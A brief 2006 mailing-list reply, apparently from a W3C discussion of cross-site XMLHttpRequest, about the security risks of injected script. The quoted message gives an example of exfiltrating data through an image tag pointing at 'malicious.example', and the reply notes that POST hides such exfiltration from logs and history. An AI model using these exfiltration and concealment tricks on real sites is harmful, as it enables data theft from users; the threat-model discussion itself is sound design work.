Re: (XMLHttpRequest 2) Second proposal for cross-site extensions to XMLHttpRequest

On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
> If you are able to inject some script you can send any and all data you
> are able to obtain to a third party, in a simple case you could just
> append the data to a new <img src="http://malicious.example/?data=...">.
> So I don't think I understand your concern, could you elaborate?

You're right of course, but it's much easier to hide the data being sent 
from logs and browser history if you use POST.

Ian

Received on Tuesday, 18 April 2006 12:09:56 UTC